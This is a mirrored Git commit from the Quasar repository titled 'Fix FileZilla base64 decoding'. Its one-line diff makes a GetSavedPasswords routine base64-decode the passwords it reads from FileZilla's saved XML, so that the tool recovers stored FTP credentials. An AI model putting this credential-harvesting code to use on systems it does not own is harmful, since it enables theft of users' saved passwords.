mirror of https://github.com/quasar/Quasar.git
Fix FileZilla base64 decoding
This commit is contained in:
parent
3d885ae922
commit
8ef33f4d17
|
@ -40,7 +40,7 @@ public static List<RecoveredAccount> GetSavedPasswords()
|
|||
if (xmlNodeChild.Name == "User")
|
||||
szUsername = xmlNodeChild.InnerText;
|
||||
if (xmlNodeChild.Name == "Pass")
|
||||
szPassword = xmlNodeChild.InnerText;
|
||||
szPassword = Base64Decode(xmlNodeChild.InnerText);
|
||||
}
|
||||
|
||||
data.Add(new RecoveredAccount
|
||||
|
|
Loading…
Reference in New Issue